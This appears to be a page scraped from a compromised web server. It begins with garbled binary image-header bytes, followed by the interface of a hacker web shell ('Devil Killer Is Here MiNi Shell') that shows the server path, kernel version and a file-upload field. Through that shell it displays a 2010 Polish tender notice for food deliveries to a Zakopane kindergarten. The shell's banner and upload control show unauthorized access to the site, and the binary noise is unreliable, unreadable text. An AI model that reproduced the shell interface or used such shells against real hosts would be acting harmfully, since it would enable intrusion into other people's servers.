JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/334861-N-2010.html

<p class="kh_header"><b>Zakopane: Sukcesywna dostawa artykułów żywnościowych na potrzeby   Przedszkola nr 7 w Zakopanem przy ul. Nowotarskiej 32a</b><br>
<b>Numer ogłoszenia: 334861 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 7 , ul. Nowotarska 32a, 34-500 Zakopane, woj. małopolskie, tel. 18 2068495, faks 18 2068495.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów żywnościowych na potrzeby   Przedszkola nr 7 w Zakopanem przy ul. Nowotarskiej 32a.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą artykułów żywnościowych na potrzeby Przedszkola nr 7 w Zakopanem z siedziba przy ul. Nowotarskiej 32A

 Zakres zamówienia obejmuje : 

Zadanie I - pieczywo 
Nazwa	jm	ilość
Bułka zwykła wrocławska 0,09 kg	szt.	150
Chleb krojony zwykły 0,60 kg pszenno-żytni	szt.	1000
Pączki  0,50 g	szt.	100
Bułka mała kajzerka 0,06	szt.	1400
Chleb razowy ze słonecznikiem 0,5 kg	szt.	500
Drożdżówka mała z serem 0,50g	szt.	1400

Zadanie II - różne produkty spożywcze 
Galaretka owocowa typu (Gellwe)-lub równoważna   smaki
 pomarańczowa 
Smak cytrynowy 
Smak truskawkowy
Smak malinowy                                         	szt.	

40
  40
  40
  40
Cukier biały 1 kg ( królewski)	kg	940
Cukier puder 0,5 kg	kg	15
Cukier waniliowy 32g	szt.	205
Dżem słoik 280g typ ( Łowicz) lub równoważny
Smaki truskawkowy
Owoce leśne
malinowy	szt.	
 
35
 30
 30
Groszek konserwowy 400g	szt.	215
Herbata granulowana 90g typ(saga)	szt.	100
Kakao ciemne200g 10 - 12 %	szt.	36
Kasza jęczmienna 1kg ( średnia)	szt.	110
Kawa zbożowa kartonik Inka lub równoważna  150g	szt.	33
Ketchup 500g typ( Roleski) lub równoważny	szt.	49
Konserwa rybna w sosie pomidorowym 170g( filet z makreli)	szt.	230
Kukurydza 400g	szt.	20
Liść laurowy 7g	szt.	30
Maggi 1l	szt.	40
Majeranek 7g	szt.	55
Majonez kielecki  500 ml lub równoważny 	szt.	100
Miód wielokwiatowy	szt.	20
Brzoskwinia( puszka - 850 g)	szt.	40
Kucharek 200g lub równoważny 	szt.	250
Olej kujawski 31 lub równoważny 	szt.	150
Pieprz mielony czarny 20g	szt.	330
Płatki śniadaniowe kukurydziane 1 kg	szt.	 44 
Przecier pomidorowy 30% typ(Bażant) 850g lub równoważny	szt.	103
Ryż 1 kg	kg	260
Paola syrop 0,5 l typ( Herbapol) lub równoważny 	szt.	20
Sól jodowana  1kg	kg	290
Ziele angielskie 15g	szt.	35
Makaron Babuni - 1kg lub równoważny 
Kolanka
muszelki	szt.	
80
80
Makaron nitki Lubella 0,50kg lub równoważny 	szt.	90
Płatki owsiane górskie 500g ekstra	szt.	32
Proszek do pieczenia 30g	szt.	50
Oregano 10g	szt.	18
Kwasek cytrynowy 20g	szt.	30
Bazylia 8g	szt.	18
Sos do spaghetti typ ( Winiary) 47g lub równoważny 	szt.	100
Kasza kukurydziana 1kg	szt.	44
Kasza manna 1kg	kg	52
Bułka tarta 1kg	kg	160
Sos do pieczenia typ ( Knorr) 1kg lub równoważny 	kg	2
Budyń śmietankowy 60 g typ Gellwe lub równoważny 	szt.	485
Kisiel 60 g typGellwe lub rownoważny
Smaki truskawkowy
Jabłkowy
Cytrynowy
malinowy	szt.	490
130
130
130
100
Mąka ziemniaczana  1 kg	kg	43
Makaron łazanka Lubella lub równoważne	szt.	100
Pasztet drobiowy 200g	szt.	300
Mąka tortowa typ 450 pszenna	kg	580
Sok w kartonie 2l ( Caprio) lub rownowazny
Pomarańczowy
Jabłkowy
Czarna porzeczka
Multiwita
Jabł-aro-wiśnia	szt	990
 220
 210
 210
 210
140
Szczaw w słoiku	szt	80
Chrzan tarty	szt	10


Zadanie III -dostawa mięsa i podrobów, wyrobów wędliniarskich, drobiu, 
                     wyrobów drobiarskich

Poz..	Nazwa asortymentu	Kg	
1	Kiełbasa szynkowa ( wieprzowa)	Kg	28
3.	Kiełbasa podwawelska	Kg	70
4.	Orzeszek wieprzowy	Kg	6
5.	Podgardle wędzone	Kg	90
6.	Udka z kury	Kg	220
7.	Szynka z liściem	Kg	20
8.	Szynka drobiowa 	Kg	17
9.	Szynka wieprzowa	Kg	25
10.	Pieczeń wołowa	Kg	194
11.	Kiełbasa żywiecka	Kg	16
12.	Parówka drobiowa	Kg	32
13.	Porcja rosołowa drobiowa	Kg	235
14.	Schab z kością	Kg	155
15.	Szynka bk surowa	Kg	76
16.	Mięso rosołowe wołowe	Kg	370
17.	Wątroba drobiowa	Kg	75
18.	Łopatka bk	Kg	322
19.	Gulasz wołowy	Kg	46
20.	Filet z indyka	Kg	34
21.	Filet z kury	Kg	130


Zadanie IV- dostawa produktów mleczarskich

1.	Śmietana 30 % 1l karton	szt.	40
2.	Mleko świeże ( butelka)3,2%	szt.	4320
3.	Masło ekstra 82% tłuszcz  200g	szt.	1360
4.	Twaróg półtłusty 1kg	kg	310
5.	Serek hom 135g typ Darek lub równoważny 
Miksy owocowe	szt.	720
6.	Ser żółty ( edamski) lub równoważny 	kg	77
7.	Jogurt Jogobella 150g lub równoważny 	szt.	1640
8.	Śmietana 380g 18 %	szt	990
  9.	Serek topiony100g  kremowy	szt	 260
10.	Margaryna Palma250 g lub równoważna 	szt 	 600
11.	Kefir 350g 2% 	szt	 288
12.	Jogurty pitne  typ(Darek) 125g lub równoważny	szt	270



Zadanie V- dostawa owoców i warzyw 
1.	Banany	kg	400
2.	Buraki ćwikłowe	kg	330
3.	Cebula	kg	305
4.	Cytryny	kg	15
5.	Fasola Jaś	kg	13
6.	Groch łuszczony połówki	kg	30
7.	Gruszki	kg	170
8.	Jabłka deserowe	kg	1020
9.	Jaja kurze klasa XL	szt.	6300
10.	Kalafior	szt	146
11.	Kapusta biała	kg	135
12.	Kapusta czerwona	szt	30
13.	Kapusta kwaszona	kg	300
14.	Mandarynki	kg	45
15.	Marchew	kg	1300
16.	Ogórek kiszony	kg	300
17.	Ogórek świeży	kg	97
18.	Papryka świeża	kg	30
19.	Pieczarki	kg	75
20.	Pietruszka	kg	228
21.	Pomidor	kg	65
22.	Rzodkiewka	szt.	60
23.	Sałata zielona	szt.	140
24.	Seler	kg	260
25.	Szczypior	pęcz	295
26.	Śliwki	kg	30
27.	Ziemniaki	kg	9700
28.	Pietruszka natka 25g	szt.	570
29.	Por	kg	570
30.	Koperek 25g	pęcz	550
31.	Kapusta pekińska 	szt	70
32.	Kapusta włoska	  szt.	  99
33.	Brokuły	  szt.	 20
34.	Botwinka	  szt.	 10
35.	Winogrona	  kg	 70
36.	Kiwi	  szt	 590
37.	Brzoskwinia	  kg	 80
38.	Pomarańcza	  kg	190




VI- dostawa mrożonek

1.	Ryba Filet 
Panga
Tilapia
dorsz	kg	
 120
 100
   70
2.	Kalafior 2,50 kg	kg	46
3.	Truskawki mrożone 450 g	kg	300
4.	Mieszanka kompotowa 2,50 kg	kg	150
5.	Brukselka 2,50 kg	kg	22
Zamawiający informuje ,że podane  powyżej ilości artykułów żywnościowych są  ilościami szacunkowymi i w trakcie realizacji zamówienia mogą ulec zmniejszeniu. Zamawiający będzie  płacił za faktycznie   zamówione ilości produktów po cenach jednostkowych podanych w ofercie
Miejscem dostawy jest magazyn żywnościowy  Przedszkola Nr 7 w Zakopanem ul. Nowotarska 32a
Umowa będzie realizowana w oparciu o zamówienia częściowe, które będą składane telefonicznie lub pisemnie przesłane faxem zgodnie z faktycznymi potrzebami Zamawiającego, zgodnie z cenami jednostkowymi zaproponowanymi 
w ofercie wykonawcy z zastrzeżeniem,  że całkowita wartość umowy nie może przekroczyć wysokości posiadanych środków finansowych przeznaczonych na ten cel, podanych podczas otwarcia ofert. 
Dostawy  będą  realizowane  najpóźniej następnego dnia do godz. 8.00, licząc od daty złożenia, najpóźniej poprzedniego dnia do godz. 9.00, telefonicznie zamówienia  na poszczególne produkty z pakietów, o ile zamówienie nie zostanie złożone wcześniej, niż na jeden dzień przed żądaną dostawą i nie zostanie wyznaczony przez Zamawiającego konkretny termin realizacji dostawy.

W wyjątkowych sytuacjach mogą wystąpić zamówienia dodatkowe  realizowane w tym samym dniu. 

 Wykonawca podejmuje się również rozładunku towaru i przeniesienia go do magazynu żywnościowego w  Przedszkolu Nr 7 ul. Nowotarska 32a 

Wykonawca zobowiązuje się każdorazowo przy dostawie załączyć świadectwo jakości dostarczanego przedmiotu umowy (atest) lub handlowy dokument identyfikacyjny.

Wykonawca zobowiązuje się dostarczać przedmiot umowy czystym środkiem transportu przystosowanym do przewozu przedmiotu umowy a w przypadku  przewozu mięsa i wędlin  pojazdem dopuszczonym do użytkowania  przez Państwową Inspekcję Handlową.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.00.00.00-3, 01.24.20.00-5, 15.89.60.00-5, 15.81.10.00-6, 15.80.00.00-6, 15.40.00.00-4, 15.30.00.00-1, 15.10.00.00-9, 15.11.20.00-6, 15.20.00.00-6, 15.33.11.70-9, 03.22.00.00-9, 15.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ma do oferty załaczyć wypełniony druk oferty z cenami jednostkowymi danego zadania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie: cena jednostkowa danego produktu  może ulec zmianie w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT ,przy czym zmianie ulegnie wyłącznie cena  jednostkowa brutto, ceny  jednostkowe   netto pozostaną  bez zmian.
Przewiduje sie mozliwośc w sezonie na dane owoce i warzywa   z wystapieniem do wykonawcy o obniżenie cen jednostkowych w stosunku do podanych w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole nr 7  
ul. Nowotarska 32a
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 11:00, miejsce: Przedszkole nr 7  
Pokó Dyrekcji 
ul. Nowotarska 32a
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa na potrzeby Przedszkola Nr 7 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa pieczywa na potrzeby Przedszkola nr 7 w Zakopanem . 
Zakres zamówienia obejmuje; 
Bułka zwykła wrocławska 0,09 kg	szt.	150
Chleb krojony zwykły 0,60 kg pszenno-żytni	szt.	1000
Pączki  0,50 g	szt.	100
Bułka mała kajzerka 0,06	szt.	1400
Chleb razowy ze słonecznikiem 0,5 kg	szt.	500
Drożdżówka mała z serem 0,50g	szt.	1400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa  róznych produktów spozywczych na potrzeby Przedszkola Nr 7 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  sukcesywna dostawa  róznych produktów spozywczych na potrzeby Przedszkola Nr 7 w Zakopanem.
Zakres zamówienia obejmuje; 
 Galaretka owocowa typu (Gellwe)-lub równoważna   smaki
 pomarańczowa 
Smak cytrynowy 
Smak truskawkowy
Smak malinowy                                         	szt.	

40
  40
  40
  40
Cukier biały 1 kg ( królewski)	kg	940
Cukier puder 0,5 kg	kg	15
Cukier waniliowy 32g	szt.	205
Dżem słoik 280g typ ( Łowicz) lub równoważny
Smaki truskawkowy
Owoce leśne
malinowy	szt.	
 
35
 30
 30
Groszek konserwowy 400g	szt.	215
Herbata granulowana 90g typ(saga)	szt.	100
Kakao ciemne200g 10 - 12 %	szt.	36
Kasza jęczmienna 1kg ( średnia)	szt.	110
Kawa zbożowa kartonik Inka lub równoważna  150g	szt.	33
Ketchup 500g typ( Roleski) lub równoważny	szt.	49
Konserwa rybna w sosie pomidorowym 170g( filet z makreli)	szt.	230
Kukurydza 400g	szt.	20
Liść laurowy 7g	szt.	30
Maggi 1l	szt.	40
Majeranek 7g	szt.	55
Majonez kielecki  500 ml lub równoważny 	szt.	100
Miód wielokwiatowy	szt.	20
Brzoskwinia( puszka - 850 g)	szt.	40
Kucharek 200g lub równoważny 	szt.	250
Olej kujawski 31 lub równoważny 	szt.	150
Pieprz mielony czarny 20g	szt.	330
Płatki śniadaniowe kukurydziane 1 kg	szt.	 44 
Przecier pomidorowy 30% typ(Bażant) 850g lub równoważny	szt.	103
Ryż 1 kg	kg	260
Paola syrop 0,5 l typ( Herbapol) lub równoważny 	szt.	20
Sól jodowana  1kg	kg	290
Ziele angielskie 15g	szt.	35
Makaron Babuni - 1kg lub równoważny 
Kolanka
muszelki	szt.	
80
80
Makaron nitki Lubella 0,50kg lub równoważny 	szt.	90
Płatki owsiane górskie 500g ekstra	szt.	32
Proszek do pieczenia 30g	szt.	50
Oregano 10g	szt.	18
Kwasek cytrynowy 20g	szt.	30
Bazylia 8g	szt.	18
Sos do spaghetti typ ( Winiary) 47g lub równoważny 	szt.	100
Kasza kukurydziana 1kg	szt.	44
Kasza manna 1kg	kg	52
Bułka tarta 1kg	kg	160
Sos do pieczenia typ ( Knorr) 1kg lub równoważny 	kg	2
Budyń śmietankowy 60 g typ Gellwe lub równoważny 	szt.	485
Kisiel 60 g typGellwe lub rownoważny
Smaki truskawkowy
Jabłkowy
Cytrynowy
malinowy	szt.	490
130
130
130
100
Mąka ziemniaczana  1 kg	kg	43
Makaron łazanka Lubella lub równoważne	szt.	100
Pasztet drobiowy 200g	szt.	300
Mąka tortowa typ 450 pszenna	kg	580
Sok w kartonie 2l ( Caprio) lub rownowazny
Pomarańczowy
Jabłkowy
Czarna porzeczka
Multiwita
Jabł-aro-wiśnia	szt	990
 220
 210
 210
 210
140
Szczaw w słoiku	szt	80
Chrzan tarty	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mięsa i podrobów, wyrobów wędliniarskich, drobiu  wyrobów drobiarskich
na potrzeby Przedszkola Nr 7 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest suksceywna dostawa mięsa i podrobów, wyrobów wędliniarskich, drobiu  wyrobów drobiarskich
 na potrzeby Przedszkola Nr 7 w Zakopanem
Zakres zamówienia obejmuje: 
 1	Kiełbasa szynkowa ( wieprzowa)	Kg	28
2.	Kiełbasa podwawelska	Kg	70
3.	Orzeszek wieprzowy	Kg	6
4.	Podgarle wędzone	Kg	90
5.	Udka z kury	Kg	220
6.	Szynka z liściem	Kg	20
7.	Szynka drobiowa 	Kg	17
8.	Szynka wieprzowa	Kg	25
9.	Pieczeń wołowa	Kg	194
10.	Kiełbasa żywiecka	Kg	16
11.	Parówka drobiowa	Kg	32
12.	Porcja rosołowa drobiowa	Kg	235
13.	Schab z kością	Kg	155
14.	Szynka b/k surowa	Kg	76
15.	Mięso rosołowe wołowe	Kg	370
16.	Wątroba drobiowa	Kg	75
17.	Łopatka b/k	Kg	322
18.	Gulasz wołowy	Kg	46
19.	Filet z indyka	Kg	34
